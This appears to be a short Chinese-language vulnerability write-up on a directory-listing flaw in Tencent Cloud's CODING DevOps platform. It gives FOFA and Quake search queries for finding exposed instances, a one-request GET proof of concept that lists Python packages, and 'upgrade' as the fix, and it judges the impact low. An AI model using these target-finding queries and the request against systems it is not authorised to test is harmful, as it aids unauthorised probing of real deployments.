腾讯云coding平台平台inda目录遍历漏洞复现

前言

其实就是一个python的库可以遍历到，并不能遍历到别的路径下，后续可利用性不大，并且目前这个平台私有部署量不多，大多都是用腾讯云在线部署的。

CODING DevOps 是面向软件研发团队的一站式研发协作管理平台，提供从需求到设计、开发、构建、测试、发布到部署的全流程协同及研发工具支撑。CODING 解决方案可助力企业实现代码的统一安全管控，并快速实践敏捷开发与 DevOps，提升软件交付质量与速度，降低企业研发成本，实现研发效能升级。

漏洞复现

fofa语句: title=“一站式软件研发管理平台” 或者360quake body:“Coding.net 是一个面向开发者的云端开发平台，提供 Git/SVN 代码托管、任务管理、在线 WebIDE、Cloud Studio、开发协作、文件管理、Wiki 管理、提供个人服务及企业版本的服务”

默认跳转到登录界面

poc：

method: GET
path: /ci/pypi/simple/idna/
headers:
User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/69.0.2786.81 Safari/537.36

可以看到python的一些库，并不能向上级目录进行遍历，危害性就到这里了

处理措施

升级版本